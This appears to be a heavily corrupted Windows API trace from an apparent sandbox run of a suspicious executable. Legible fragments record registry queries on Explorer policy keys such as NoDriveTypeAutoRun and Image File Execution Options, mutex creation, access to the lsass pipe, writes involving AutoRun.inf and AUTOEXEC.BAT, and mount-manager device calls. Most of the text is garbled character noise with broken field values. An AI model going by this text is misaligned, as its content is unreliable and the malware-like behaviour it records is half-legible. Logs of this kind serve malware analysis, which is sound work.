:dd788#gu6v
a377d9$4!d"
ac2gc5w5rd$
edd542$7rdv
;181fcr5r8q
444e",b0/6
/"sqst%l:,
ladDib2`jy
/"S]CC
3x5id7p1 0"
!lpFil%Ocna(8rp}bnah k|}0
7$') **-,,.
,"1748","
dd688cfe6ceb376d9d51d79bc2
k|a{<XalpMuxgh=t
;9"-"1w5:","9dd688cfe6c}51':3;t01d7
5a"V47'5rd
2$7rdI
;181fcr5`8da744d","1768v{ `:8auvs",B
#gBd}oa
Whrdadb-2S@
@ESR",b1h0%
300b4"l#|py
brt@dd2dcs
3x0140t1 8
S!th32P2nseN
JD->14p12,"
yExeFi,d=>H
opMe.e8d2
101901q0"12
16.389b-217
;","9d$7(8c
f6ceb3w7t9d
2d79bcrgs57
ad1bfd$5$2d
adca81x1vc2
a8da74te2,"
468","2dwis
qy","R%fSre
weKeyE8V2,"
VCCESSb-20x
30000dp#<"h
fy->HK
BL_MAC
!lpSub
lftWar%]]ic
lsoft\
p NT\C5sben
Uersio.]Gin
311121r0"6.
;9","1w5(",
:dd688#gu6c
a376d9$4!d7
ac2fc5w5rd1
edd442$2bdc!a3(
?a"5b:ge223l+&)=:872=0aqr
dlry","RegSetValu|_xA90"SH]\erq
u.2X Vi
o;2$z3' ` <
`:s^=4s!:1'f<;tiif'Q:a"
t ba>kcd+{20{PuO
pu`de^
zExV",bRECV=PS"-"081 0%I3d4#,"(Juy8DKKEX_L
BQLJ6BCHHNEb-2le/vbKdy-~R_FA*BRE]Mi#s
w\Whnd/vc\}
qrentV%sciQ
_Explo2db\|
uanced
q\Hidd%oLSH5TALL"
B311121r0"6
O;9","1w5("
_:dd688#gu6]
a376d9$11d7	9a"
87'4cf2fcbc<=8o:ojlq)#+$su%,{"
YIJG\DCK
dR_j_Oj\RJ%
AU7	 <Rx.2
v !7m:2,ypug2qdr" <"	gwC)gqt>Iuy
zG.w CY
 <.kz <k2 <?a2 yj[i"/.P
QUJy.2t+Qez
f\Mhcr
rgRe,Tineow
fntWer
hgZM7{plnre
#Shdll
!D212021
)O!,"074
"- :`a0?
m`vfd44
84rd>c(00
14b9da
5<P-\!1778"
ptrx",
fryWal
dMLXQ/"STCC
#V!,"iKe
wE30010d
UalteN
md/=WqguX(r25W "tl; al3"mo3"^s1(M
j6( ,"9
>du7kVs\46d8d5
1fc474
g443d6
ekR)C;0fb24
9lR&G7d"-"1
=Vqeghst
3'fgCsea
dCVh3{W"-"S
CBGPW'*%
VOWSER
wrJmJ"QPofuwa
qosnft
ts\Bur
qsinn\
fr\Rhe
>L311021
!E;9"-"1
49 /&<bcbf:s
;4s	<1'N:;t
<f!`fdd
<fs`02)
fc25b8
`744d","1768
r bggis
|Puf[d{|aludEx
#,"SUCCESS",2}.2jKey1a2h
o2 18erM/"lqVa
f->Rta
u}q3]!dwUyp
,603^!lpEat
,6B+/Goctme
g Sdtt
bneute
brt!Me
u]RqkbtfU,^C0>pd%/ <~<`T	+c=Jn1 
o3)2111
i,#91##M2749",
8le9H;cfd6c
:d50d7
674cd1
gle;G1d6cdc
`24c8d
6<5kW/"1668
wem#,"
o`fOmgtf
2 $P <
rVkleNM
nu2:.uol"
090111212126NS:) ,"1[T:2XB;te>=)bfe6reb
6>a(`51d.9b
3nf$24bd bf
e<1#b6bdra8
98cr54b8}a7
5l'=+176)",
smbxxtry;,"
doJahnKexEx
"- EELJR
)LU ,"l
{=?[niuwart\
bzn|kft\Fi
rSFurrtn
dzrfin\P~l
hmrSBxpl~r
-;019!1
393>96.3)9
#96;5","8d
v89aea3eb~R5&LXf%
0v/T5$:
f$DSf&`dcaDP: 
0$c0gp644d3,"
6>;3("revis
sq!='Reg^pe
JmzT~W",3SU
BMPB%,"0i00
183t9","yKe
,6KZNY_CDRR
O\\D^ER"-"l0St`Ha|+9
pultVeb
mabfds\Eipl
090=4212'.3
8*--77483,"
el77?cfe'ce
2?7k0d51u79
b:gl>74bu1b
el5;?d6becax192eg72e|
c'dVf2p@3'^Z <V
eAwery
,JLU[E",#
Hey$>0x1
at^3e0+, LpVal<eName->OmNetKood"
P4>689"$A3' [ <#
'$];8coe6cdRzs]g9d<1d78
`57=bf
bfdd}42d6bdc`:180ec24b8da744TA.2
T4(jO b`gis
{2@APufo3%
HeyLxW"-
 OURL","#
s,!fy-7HIeY_LO
AL_MACHHLE",!lpSubKey->
.kswoso
qregtVesC +	_Poeicid
slo{ep
"2y190111200126-389","1748
du3ceb#S4t%
1fc<74be
g44;d6be
0|W;0fj26B8da7}4d","177:","qegistry","j
GhR",";1AS17Q2-
s8S30090e0#
k,(fy-7HKEX
6QEN]_WsER",klpSubKex/>Soetware\Micr
mgv\Cu
2gbrI,.=Sol`cierl
oorlr"
ctS:01810
2126g389","1668",!9dd688cfe6
Rf)dP3t29bc*
Q`t0J'$:742m6rdbQ}ug3fc;4r8e
rpTg",+1'
8","registry#."RegQueqyValue
U2`GDQ
)WB@","RI x7
;pl3009e0"-
blulNamd
2SroyepTiesM0Computes 
"10190111212
G3'18",
]:sgEu#?a37?d9d4
-scac2oc575
5u9edd=40D6bdc(8180fc25`8da444d","1768
{2)"ReG)ruB-giDH
bt!FA@LURD
efz/"hBey-?
\LOJAN
NE","lpRwbKez->Software
+ks&	q
^Glndo
qiog\PomY*-
q\Eqplos
1112x2126.388 ,"1448","9dd68
Q4t<d51
3bfmd443T
aa8880fb
fa7=4f
8","reghqtry!,"RegOpenK
GhSE.2C2AS@SS"
."hBey-?x
]CU[RENU
P",+lrsubKe0->Softw`pe\Mjcrosoft\Wi>
mg/;Ae
g~qVer
7m|h[C!%_Exylord
~^]!20890
01212126.389","0748","9fd688
`#26d9
^`s3F uc7bd8bfde
}v05bdja819
7'g7b8ma5
4d",k1768","sggiswry","RegQu
U2)"FAi$WBiJ.2#
fy-70x01
ytbf0"%"lpW
=16Maml-<noInt,rnetIcoo 
"10190111212yZ4>gP;2LJ3'18",ZQft
P:sgEu#5a37?d9d4
-siac2oc575
5u3edd=40D6bdc(8180fc25`8da444d","1768
{2)"Re
bb!FA@LURD
efl/"hBey-?
\LOJAN
NE","lpRwbKez->SOFTWARE
^Glndo_
%>piog\Shd\%
#npa}ibim
BppeiaAtion:\9dd688bde6cfb376d9d51dgP`sn
a%_]`t4bfd
_`tbI{qr3fc;4b8eQ~p~g"
auz221;10
.389k,"1748"- 9dd588cfe6ceb3
P`s7fc5
wr,5bdja819
/'z7b8ma745
shk2761".
regi:try","RdeOpemKeyExW","FA#NE^/ <:H.2mKey
TJ[y3]\Nc
NACAINE#
k(6PubBey-?
>"3tarl\OIcros&ft\Windnus\CvrrentVersi7
qL@xpl
s211;12
|:",+17
~|gd618cFd6ceb376d9d50f79bc2fc674bd1b
aq=180
/"1>68"-
;!Xjst{y",#b-#qsenBeyEy
xhbPUCJESs#,"0x000000e1
vf*Hey$>HkDY_CURRENT_UR
	qm!lpZubkdy->Software\Lk`rosofpYQindo
ay`s\E
29081120
-380","0
/"9md4
ceb376d8f51d49bc2fc574b
4raca8
Y6r9L"w
7d"%"177
qeg`strx
}fhfgQ|epYValu,ExW","F@KLURF","","hKey-R2h<\2 (\g ',"l@:c|I	LqlMn~ylCodmonFB&1Gp"
au	221;10
.389k,"1748"- 9dd588cfe6ceb3oZf)
Y3tGU`s7fc5
4bdja819
6b8ma745
3761".
regi:try","RdeOpemKeyExA","F
N.2mKey
OACAINE#
QubBey-?
UARL\OIcros&ft\Windnus\CvrrentVersig
o`dtibQ
kd=1MrkM 4F_{29D04Guyi
BEA$1068
vr;-0102
B303y9D}"
"32190211212126.3XT <N\5$@O.2<dd6
tvW:d58d79cS{"P674kd1bg
1d6kdaA8180/c24b8da664d"/"1768","re
?gwJpen
	}VRE+,""-
Tz->AKEY^
sO_MHCJiNE",klpSubKex/>Soetware\Micr
mvh2UyF
mgv\Cu2
g~88gbrI,.lSol`cierl
<@oorlr"
:01810
2126g389","1668",!9dd688cfe6
`#CXf)
[3t29bc
Z`t0B%$J742m6bdbQqu
3fc;4b8e
g",+15
8",";egistry#."RedOpenKeyExW
= <'0x0
Iz->AKEY^s
~FNTVUSES
}fAsSukKgY->So/tware\Mharoslft\WindowsD,wbV
pclon\
gc]m;0Flre{"
31182120
;9"%"3
48",k9dd688cgg6cea376d9d51d7I
f!gfdd
ec2=b8d`
}pL!,"8768#
s6Ldis}r{
,"Re.QueryVamweExT","FAILURE
/.5x00
_2 a@ <#L3
GoueGame,
+elnt{olP`
0111{12126.39;","2748","9dd6
HavIFauZC5&a9d5a
v8Fg1bodt45
!:Fgca11(0g
v9G;da>4$E","1768","refkstry","QegOpen3
6CYIURE
Rj[dIiv
IEYVLO
b@HIGE2
WaKep-.
pe\DicRosoft\Windows]AvrrentRersion
S0 )H2!0
226'389#
78"%"9de
i|Bee6je`
76d9-51d79bc3dc577bd1bfdd442\G`t'
:!hAds74b8
r&!,"{egirD;=</"RlgOpd
!fFxW+, sUCCE
S","0x012000f0","hKey->
4LDZUSE
Qeck&9
<SootwasU
arozoft]
mwsUCwRrent
ersion\Qmlicjes\Explore
C2!9B3!4212)@4>
:",+9dd7
g6clb377
3d70ba
fc57}bd1bfdd562d6adca8180fc2t
:t-E6$<P.24768R^ b
kcuR:b
 RenQuesI
weEqW",#
WRE+, 
,"hK,y->0x001200e3","lpValue
vVjlde
yu+221;126/
q}9/"1>48"-
a7x588jfg
beb3m6d9d51d6
:0/ec5>4`D0bfd>442d6bdc`8383fg24b8da74
C5&0Q.2R
eyvtry
KKnFxA+,"
T3CkKP",+0xp1@0
)f2"%"h
d{.>HKEY_CLASSES;!M_$Q.2
QegKey
:FLzB0j&7FE9-3
$59-X2D
-08002W00309D|\InPplcSer
A2!;011
pf<!17=8 ,"9dd788cfe6cdRzs'g9d<1f79bc2gc574bd1c
<7&72d?bbC`818jgc24b8d`
lgw!,"870
#,"r?fistry"- RedUueryValueE
$ <2'WSk1QCbX 2)"hK=
3",+lbValueOame->(nt\)%
";0390111312126.39
0741".
9dd698cfe6cec176d9d51g79bc2f
f$12d6
E: gK+tl;da>46d","1668","refYj0|z",+RggOpenJeyExW",#
LFSS+,$
x000)10e8","iIey-=HKEY_LOCAL
9CSD<LU
Y |uSubw
{=v&{cuM$
gtuy"L
"20190
:9"%"p748","9
:8cgU~'
`37?dxd51d79b
a575J#u
ddd=4sd6bdca8
544m"n
0768x,
 RenQ7EsyVa6u
EFSS+,`
,"hK-y*=8{001
:",+l2value	a
g-=SyrvfiVcs}pInProgr
[1(5T.2
B6(',"9@
du7kti
56d0d51e?(i
e1`fdd442d6bdca8QN2v
D6r=da7LBf2
T3'70#=
reg`st
egOien
","_AI
"",;hK
y->HJGZ[LOCA
Qe`Key
gntJOn
romSet\Control\M
"E2!5G3!0:1
06.:89b-
:",+9d
688cfe6ceb377d9d51d7;bc2fc57
ft142dr
fs1O3(1nc
`8dh74te
568+,"
egistry","RefOpenKeyGxW","SU+4GC'U.25x00
O <#`KO
/>HBEY
]MAJHI
rSukKe9,6Sy
vemUW@
";08y011121
326.391"
3741"%b9dd688
de6ceb255`<b2
F: dc24r@fq/L6t#
48"%"r
{",+Re
Tal|eE
WCCLSS
-"","hKey->0y
20e1",
mpValueName-?qfed"
"6519011uJ3"aJ4>o@;2DZ3'
@ <'9dd
4sdR{s
f9d<1d
a57=bd
bfdd44
f6bdc`
dc2=b8
a744d"
 1768#
eis}ry
*"RegO
gnKeyD
 SUJCEsS","0x000000d:!,"hKey);HKEY_
0K^A[.2p	QegKey
-G]]k,0
321;126/
."1>4:
-"9d>688cfe6b
4d9m53D69bchfc574bd1cffd746d6bdca81\IdsBM`(
 <'176
eyrL;=
."RlgQudJ0
nueLxW"-
AESZ".
ey->0x01
g8"%"nPWalu?Name->OsMocdfrTath"
K3">T1(<","
afe?cec2os 
f51m79bbj#'
54bm1rfef472d6bdca8180f/H6r`
c'PNf2)"17FB <^
 ,"[egPt=u<
clulEzG","S]CCESS",#zif
Iey$>&x000078e8","lqTaoueName->OsLo
;",*1749
fd608cFl6ceb3
4d9d50d79bc2fa574bd1b
f$<If&gdca
64d+,"16
 renists
PegFpgNKeyE1W","SUCBGSS"/"0x000000e|Y.280giqEJ[@Y_L;8C\
."lySubJU0i
QYS]EM\R
9011x212126.2:9",!1748","9dd
1'3d9d
a"gCvw
`d1kfdd5
`dch8181
`8dh76
d","x768","rdeistqy","RegQue
Tql	gUt+ <'SUCg9QC
{->9x0p1
:",+lb6alueOame->SysuemPcrtition"
nN2!aL3!4212AN4>OD;2-
:",+9t$7
g6clb3w7
3d70bqRfc575bd1bfdd562d6adca8180fc2
^.24768
kcuBxg
 RenQu%s
weEqW0L"SUCBESS","",#hKe{->0x000000
rFdlue^
ou1CQirTd,
crt`ty/o
001001q0
06.:8+B,"1758","9dd7:8cff6ceb376d9d
7'1bd1
ftDI0t6beaa82<0fc2
:tIJ6$
K4( ,"r
MpegKu9DHVg
 SUJCE
z0090"Pe8",#hKey->HJGY_LLCAL_MACHIN
6gi(>So
^]hCs.
mftUWy.e_v6
Aur{en4W
mn\Zef
#20190110012116.389","178F <:Gft
F:sce6cY
`c2oc%w5Ret
ddd=42$7
:189fqR4b8d`744d","0568"/"registry"H\Pu
TqiueE
-WSCERS ,!","hK
2 0N2 g8",
wuOAl$
<So|rs%QQu-
";01y1
321;6<S89",#1748","8fd68;cfe6ceb376
0vf574r
fca11(pgS3q
:da>44$#
48"%"`
gistsy","RegPweryUalueExW","k*AS
,Q2|] <'hKe
 ,"epF!mEd
oe-7So5s
0R0190011212127,389!,"1748","9
gr676d
H;rc2gc777bd1bf
c(380f
 17?8 ,"reghstry","SU.
gnKlyGxW","RUCCESS"-
20090g8","hJey->HKEXo
CL_DAAHINE"-"lpSubKd
mft~apE\Micsosoft\Wh
q\C|rpEntVession\Seu
111202126.388 /&1748")$>dd684
6ra1bf
4reC"x
:0fj24
6d"%"1
peg`st
ggQ|erYWalueExW","ST
Q",+",
iKey->0x000012f8","lpRdlueNa
ps`Pat(
012826
389","
548",#	v 
:8coe6
eb376d
f51d78
a57=bd
dfdd44
f6bdc`:180fc24a8da744
 b`gis
Pufa<!
{VaeueEy
QUCJEQs",""e"hKey->0y000200e8","lpV
ou(>Sev
csjc&1
aePhth"
390813
.389","1648"."9dd688cfe
4t<d51(
3bfmd443T
aa8880fb
fa7=4f
8","reghqtry!,"RegOpenK
AS@SS"
&x]."hBey-?x
&]LOJAL_L
LE"%"nPSubK,y->Softvcre\Nicrosoft\W
puktVe
QuuU3bp
"291900
xvL012?.388
}fO548+, 
dd68qcfe6ceb256d9g51d79bc2fc
6$7d6b4
w"Cfa7=4d"-
xsM:",+regh
 ,"[eequery
alueExW#."SU@CESS","","
2 50e8
g->ZervhS,
akChcheQ
0111{12126.39;","2748","9dd6
5&a9d51
f1bodd45
fca1180g
:da>46D","1~68","refkstrz","RegQuerQ
.2VUCC
/>0q0001
y!M ,"epVam
oe-7SgRvice
ackCachdRath!
"2019011
;2)"17
g6clb377Tp F3d70bc2g
ds@`d1kffD442d
bdca8181dc24a8da744d","
kcqry"$
ruok&94zW"%"SUBs
" ,"9x001
:",+hIEy->H
EY_LOCAM]MACKINE","lpSuR
uqwe\M	
dd]w+.
mwsUCursU'09grs`on\R
9011x212126.2:9",!1748","9dd
1'3d9d
a"gCwwY`d1kfdd5
{ [`dch8181
2vZ`8dh76
d","x768","rdeistqy","RegQue
 <'SUCS
{->9x001
:",+lpV`
$!"cme$>FRiver
achePati 
"10190111212	
3'18",J
`37?d9d4
-s]`c2oc575R,u
ddd=42d7J#'
:189fc25
544m".
0768x,"regisu
!qD RenQwEsyVa6ueExW",#
)GSS+, 
,"hK-y->0x001
:",+lrvalue	ame->DrhtfvFgd`ePath"
ft388cF
1'7Lp n3d70bc2gS|sh`d1kfdd5
z h`dch8181N$vi`8dh744e
tqn568+, Rdgis.ry","Ref
IeyLxU
CESS","1
atR200l8 
"hKe1->HKEY_M
-]MAJHKnE","+pSubKey,<Pkcrpire\Micro/
 "5190
z|j ,"8748#
k}0f681cfe7S-&e56d0d51e
~&60fc<74be
:53f44;d4Beca8k80fc24b9
9dl6d"%"3
78",xregistrx
ggQ|epYValu-ExW","ST
Q",+".
hKeyj>0x000012f<'*%dpValueNaE
0&+389
p /488jfe6bU+w{4d9m51d6	*'|dc5>4bd0J! )642m6bdb
`bw2fc;4`
ea74nd","1769
tq#{ncarmNhzat3on","Crd
wteqW 
ESS","0y
ata20e=".
lpNa*e->(nulm+!	
$5819011121
`#26d9
`s3V*qr6bd8bfde
}v"4bdja819
/'u6b8ma745
j3761",
rynchronizath
4qe CrlatELutexW","SUCB
h."0q00
100f0","lpNalg.>(nulh,$
:2)"9dH
g&bU*w
4d9m51d6	+'
dc5>4bd0R. $642m6bdbQ
2fc;4b8e
lgwf",+17
9","synchronh
;0-mn"%"CRdateMutexW",#
GSS+, 
x000x00f8","m
%,g->!nwLl)"
M"20190103152170);89","1W
`s7fc5
}vQ4bdja819
6b8ma745Tjh
3761","sM -Dvry+,"Rd
#\lKepEzw#,"S
CCESS",#
2009fa
-"hK?y->HKEY^
}N_MHCJiNE",jlpSubKex
Tdtwhrg|Micr(soft\WioflsvZD}rrentVer_
:)',"1
q|Nde6jeb36
-}J71d>9bc3V+q
6bd8bfde
svK4bdja819
6b8ma5
5d",x1768","s
?:Avry+, rdgQu?ryValueD
 SUJCGsS","j,"hKey-?
2009fa
alueNamd/=HjaKmvel"
4(=cfe
4t8L|uM59bj2fc4
}&N3bfmd443
n1Oaa8882Fb24bbda744d"-
:",+rgGhstr#","RegQtgryUelueExW","S
gi(>0x<
k(UTal|eNalUdzjmgLlvel#
219913
3121h6.389",#
 ,"0df
98cf?6ceb376e;d52`79bc2fc574Z
aq=180
."1>68"-
;!Ekst{y",#
=4rwerpVcLteEx
","FAILT
 ",+hIEx->0"000000fb ,"otValueName-
3)5111
kh?3741","8T-r&:cfl6cec
oe{;d58d5
cc2f9574bd1bg
0d6kdaA9180<c24b8da664d!("1768","reG
g~NeyE
;.""%"hKdQjz*z009000g
>npS|bKEx->AppLogLevd
1112v2126.388"."1778&,"9dd68
7!a79b
+"qf44;d6beK&|':0fj24b9
;d,6d"%"1
78","system"-
+vfLikrcRyA",eSUCCESS#, 0x74960000","d
VEUAPI~
x}=311;1213
gw6;",+1749
df)fd618cfd
$!m176m9d50
mjqa2fj57
cd1bfdd442d6c
92,380oc2
c8da744d","16
if> reniqTry",jRegOpenJ
iU",+FCiLUREe,"","hKd{.:HK@_XDOCAL_M=
abjsofx
RqfM!N|dfe{s2
w<;;0181"
a;%189+,2
648","9dd688b
6;ogb3>6t
e51d79bc2fc566bd1bfdg042d6bd+
5$1d",
.-tvry+, RegOpdnKeyExA#
]ACEZS 
"0x010000fc",#hKey->HIEY_LOC
JYKE",
jdtwhrg\Micrnsoft\Rpb
DN$001003
1212026.389",#1748",";dd688cv
1'3d9du
a"g3|s7`d1kffd442d7bdca8181
*v0`8dh76
d","0768","refistry", RegOpe
U2)"FA
.2#|k,Jgy-7HIEY_LOBAL_MACHH
f. lpZu`key->Roftware\Licrosofv\Windo
Aewren
d F`lg Execttion Opu
&*s^9dm6:
cfe6beb376d9d41d79bc2dc574bd=
6"a6bd_
`74=dZrpcTh;7adPoolThrotule"
"2019P
3!7121J
#,"0db
98cf?bceb376d9d51e79bc2fc574
3rcdd4
b24k8bA644dxx"1768","reghstry","Reg
g~NeyE
-""%"jKey->IKEY_LOC@
BHIGE$
"lpS<cKey->Sogtwape\PoliciesT
+22190110212126.2
#17=8$
98cfe6cec376f9d51d79bc2:
f!gfdd
fs`px|
gc2=b:da744e","1768#
rted"*
hbraryW"-"SUACESS","0x7
22)"lp
ou,v;4
st4'dnl"
"301901113
7.319$
#174b#,"9dd689cfe4ceb376d9d55
0vf574V
f$5zvr
eca11:4fc24c8
`744d#
78"%"`Ijesy<u
l","CrdateDileW","SUC
  }000
dNade/>\\.\QIPE\lsas
#dwMeuIredA$bess->GEOERIA_READ | GE
UBLTE"
; 0y)v
312?.189","0748","9e
bfe?ccB376due51d79bc3fc554bd1bfdd442
c(480fS
#17?8 
2fildsystem","CreateFhleW","
AS@SS"@
-"lyFoLuNam,,>C:\9dd688cge6ceb376d9
3t29bc
`t0*"v
542m6`dca8190fc24b8e
e",+dudesirddAccess-?GENERIC]READ"
2!4121
:)#df#
58"%";`d688bf
7ceb36
41d>9`C0fc564bd1bfdd542d6bdcc8180fc*
5$1d",j
.2g!(~
xstlm ,"ReaeFile","R
RS"%" 
"hFime->0x000100cc","lNumber#
qDjRea
1&#EN8
1199131212136.399",#
#,"0df
88cfd6ceb376d8d51d79ba2fc574
f$12d6
: g#qt
9da>46d","1668","fim%:=
uem+, WriteGile","ST
R",+"*
hFil,,>0x00012128!,"nNumberOr
kd`->6i
011;10126.389","1749
ed618eFe6ce+276d9d51e79ba2fc574bd1b
f&gdca
0$cp-%
54d+, 1768"-"filesyr
-"Rlabfhle"v#SUCCESS#,""."hFile->0x
as',"nF
MvC1=!
UoRlaf->65526"
021;14
/399x-"1748",#9dd488cfe6ceb3
3t29bcn
`t0*. 
542m6`dca8190fc24b8e
e",+11
8",".hlesystel","UriteFile",
QC',""
g=?x?t
10082:","nNtmberOfBx
nWr`tc
>655t7"
"20180113212126.399
:2)"9d`
g&b-+w
7d9m53d79bc3fc574bd0
542m6`Dba8190fc24b8d`744d","3768","N
qd`m",z
k|djef
TCCLSQ","",#hFile->1
100jc 
#nNulberOfBytdsToRead/>65536^
3)5111
0741"*
)dd6n9cfe6ceb376d8d51d79bc2f
5$gd1b
080oc0
c8da644d","1768","fildsystem*
 Gwitef
oR",+".
iFild->0x00000128","nOumberO&
{d`sTo
<&5536#
	"657>88;:2121>; <)(","174*18"9dd688cfe6ceb376d9d51d79bc2fv# 4zd1bfd}./2d6bdca8180fc24b8da+)*{","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748
,"9dd688cfe6ceb376d9d51d79bc2fc574bd]
0!399'
299+,"
#9dm68
bfe4ceb376d9d51d?
a%24bd
6"e>so
`8110f
`74=d"
#1748","filesyst!
gqaFil9
#",+hFim
y00902
cc",knNumberOgBytgsToRead->6
8",+1749
ed618aFe6ce+376d9d51e79ba2fc574bd1b
f&gdca
54d+,"16
#fieeqYstemk,"WriteFhle"."SUCCESS",2
k|`->0L
OumkerOg
rTo^rkTe->6|536"
"21190311212126.3a
5$=","E
276m9d50
b2fj57
bd1bfdd442d6beca8180fa24b8da
 !268"
-"Rlaffole"|"
TCCESS",""-"hFile->0x
2 50cc"
xtezTmrbad-d6
"20180111212126
;)',"1
ge6je`
16d945
e79bc2fc575bd1bfdd442<
`tfa81H
e",+15
?","<i
dsystem","VriteFile",
WSFESS
1x0902
728"|"
OumberOfByuesToWrite-
026'3;
%,"1m4
#,"9dd688cge6ceb376d9d
3t29bc*
542m6`Dea81h0
b24b8da744e","1768","^
nuvyst5
#,"ZUAcBSS"v"
-"hFile->0y000000cc",R
Lehber
,>6<51
80111212127.399","174
.2<dd6
8d58d5
ec2f95
5bd1bfdd443d6bdca8180
0$g8da
#fieeqYutemr,
VriteFile"-"SUCCESS",:
.2mFilU
#,"gNwMeerO<B
uesToWrite,>20342"
3)5111Z
0741".
?dd6h8
ge6ceb376d8d51d79bc2f
5$gd1b
080oc0
e8dam4
e","1768",#filesystem
 B`adF
#,"+, H@ile}>
y000000cc"-"nNumberOf
vuvToRu
#20892
6121h1
7.399","1758","9dd688S
g&feb3
gc5>4`D7bfd44
3d6bdca8181fc24b8da74\
 <'176
l",+CmP~Fil?E
V","SUCCESR","","lpEx
vykgFi
e681cdE1cebi7
e9d51d79bc3fc574bd1bf
6$7d6b
ea7=4f
GileName->B:\AutoRun.u
/390".
7748r,
8dd688cfe6beb376d9d51,
;rf2fcU
e6bmcc
680f92
c8da744d",#1768","fil
{cqem"
#,"ZUAcCSS"|"
y000000cc"-"lpFileNam
<S?\9d
7d9m53D09bchf
474bd1bfdd542d6bdca81
ds74b8l
rirldCCeess}>
DNERIC_REAE"
"201901
0!7126n
#9dm6:
dfe69e
276d9d51d78bc2fc574bdQ
dta442
5b8ma5
2d",r1
78","filesxstem","Rea
k|`","
iFiee/
7x00j0
1cc","nNumcerOfBytesT
gqa->2
021;10
)399x,
0748","9dd788cfe6ceb3?
f)a51d
cfdm46
c6bd9a
080fc24b8d`744d","176x
.2cile+
 <#3]h
ueF`leV"-"SUCCESS","0x0H
2 5cc"
?C:UAUUODXEC.BAT","dwDe
puaAcc
111821
126.399","1749","9dd6:8cfe6c
;t01d7
7'5*-u
gdd=42d7
9189fa
4b8d(744d","1668"."filesysteu
ctCile
#,"aFild
100902Cc","'NumberOfCyteqToRead->26X
2!<011
4>2qpfR#17=8",#
5 I98coe4Ceb37
d9d51d79cc2fa574bd1bfdd
fsd818
#,"8768#
mespsvEm","
reateFildW", SUCCESS","
2 fc",6
g^`%,iDB:\0dd69
7cek35
d9d5xd79bc2fc474bf1bfdd442d6Z
: cc24>
6t#dk 
Ees`red@
r->NELeRIC_
"21190311212126.3
5$=","
avd~*!
276m9d50
b2fj55
bd1b/dd442d6beca8380fc24b8da
 !268"
qir<,)V-"C{eatd
V",+SWcCESSk,"0x0000112c ,"lpFileNa}
^QPTOEl
V2-j-36dsi{edAb
,>GLNGrIC_R
"20090131212126.39a
6(',"9
du73,&C66d0d51e
3fc<76Bd1bf-d442d6bdba81:0fc24b8da7
3'38",
{cu-%fB#CrlateG
$!8#,"ZUCcESS","0x00000030","lpDileNam
CEQOEXI
,uy-ehNewDlsird
dss$>GeNERIC_READ | FENERIC_URITE"
2!4121f
;)#dju]58"%"9de
ge6jeb
76d9d51d79bc2gc574bd1`fdd442
:!=0fc
5$5,dhJ0761","g
xstlm"
"CreateFileW"-"SUCCESQ","0x0
a2)"lp
H]PIYE\lr
#,"mwDEsiredAccess->FENERIC_PEAD | O
AORRITi
2!8xyuU312826.2
qfI#17=8"
"9dd688cfe6cec376d9d53d79bc26
f!gfdd@
idSgc2=b:D`7447","1768","dewice","Devi
1#,"+, HEevi0e->0x00000125","dwIoCon
m|Fode
hkA-"lyIlbtffe.->0x00000000#,"nInBuffez
kj`->0X
qOu}BwFger-b0x0120f37c",#nOutBuffer
xu(>0xh
2(#dk(
CytlsReu
e->9x2
20f3~4","lpOvdrlarped->0x000H
jm89"%"1
h}8dd?88Cfe6ceb376d9d50d79bc2fa574bd1
0t3bdc
a"5*q =644m","0
-"f`lgSyste$","CreatdFilgW","SUCCES[
2 5001
;le-7\\.]
>15uPo`nvmanag,r","dwDerirefAccess->AT
3!3yzuj7.309",#
pa#,"0dd
88cfe6ceb376d8d51d79ba2fc574
f$12d6
: g+up49da>44d#
eu`78"%"dEvice","DeviceHoContron","FAI
 2)"hDa
< yxxtd112=","e
nnt{olcode->0x006d0018","lpIlBuffer
6)gb00n
@eg.#6
hze$>0x1
vtc146+,"LpOutBuffer->0y00498782","nOu
pClze-
2 1zwf|#lpKyter
"0$snem->
x0120f374","lqOverlapred->0x
3!3yzu|7.309",#
pw#,"0dd
88cfe6ceb376d8d51d79ba2fc574b
f$12d6F
: g#qt.9da>44d#lku{78"%"dew
*!o-"DlviCeIoControl",#QUCCESS"/"","hD-
2 5012L
B/-48nlCfde-?p1tz7d0908"-
oBuofeR->0x0049bb00#."nInBufeerSize
6&',"l
dvd2n~xy00=8611pkhjoOu}Bufg
 {e-70x
00000ee","lpC{tesRetuqned->0
.2ipOvM
-w100900
"20190111212126.398","174h
.2<dd6P
c"8d58d7
rc2fc574bd1bfdd442d6beca8180
0$g8da
qi#renisTsy","RegOpenKeyExW","RUCCESS
  }000
,=n?HKLY_CT
U_UZER
-"lpSubKey->Snftware\Oicroso
Tus; +,]Exylmrer\M%untPointr2\CPC\Volume"
0 4901i
0&/{p}c-"1>4:","9d.688cfe6cdb376d9d51d79bcJ
a%24bd
6"e~+ #`8110dc24b8.a744d","0768","registry
 B`gOp
jBCEZS"
#0x00000138","hKey->0y000001
 <'lpSu
j0Z792$8e
0-11e1-9999-806d6172686f}\"
0 4901	
-"1>4:
-"9d>688cfe6ceb377d9d51d79bcj
a%24bdA
:7_`8110dC34b8>a744d","1768#,"registry
 B`gQu
#SUJCESRbef
-"hBey-?
10083:
alueNamd/>Dawa"
"20190
1)<","
 )e$ux
bfe?ceb2w
e51m79bb
64bm1`Fdd44{d6bdca80:0fc14b8da744d"
gwlstr)
SxEx^","R
sRS"%"0x1
038+, HKey-wHKEY_CUSPENT\USER","lpS
vgdre\
)Zeowz\Cus2,*@Werzion]
)4Ynre{\OOuntP&ints2\CQA\Vooume"
4>699",
 <#y'$
98coe6cd"zs
e9d<1d78
2vUb57=bf
bfdd}42d6bdc`:180ec24b8da744L
 b`gis,
3%^JeyLxW"-b
sBESZ","1
101;4 
"hKe0->0x00012138!,"lpSubKey
0==e41
;)8ynx
7d687268v/9r#
312824
399"e"1748",#;dd6;8cfe6ceb37
a"cc57<
ft5tq$
cdch8181&*v
c8dh744e
668+, Regis=ry","RefSuerzValueExW",
 2)"hK
2 1psq
5",+lpV`,<!d`me$>Geo
#%_hon+
2019y111212134.39:","1748","
aug376
5)c#q&K474kd1bg$-p
3d6kdca9
itOb24k8fA744dk,"1768"- filfsystem","C
 <'SUCS
  ypsp
112=","m0
-JdNade->]
jnun}PmIntMa'ager","euDesjredAccess-
3"0rrr
/390","0w}|
-"9md689
beb:74D9d51-79bc2fc454bd2bfdd442d6b
6r=da7
3'7:!('bb~`in.!,Kugice[|C{{beot;6"]]TRJrE"
NcM_CHI
"dwIoControlCode->0x006d0034","lpInBuffer->0x0049ca38","nInBuf\^rSize->0x00000208","PMqJ4
7%" r->0x0vsqp/
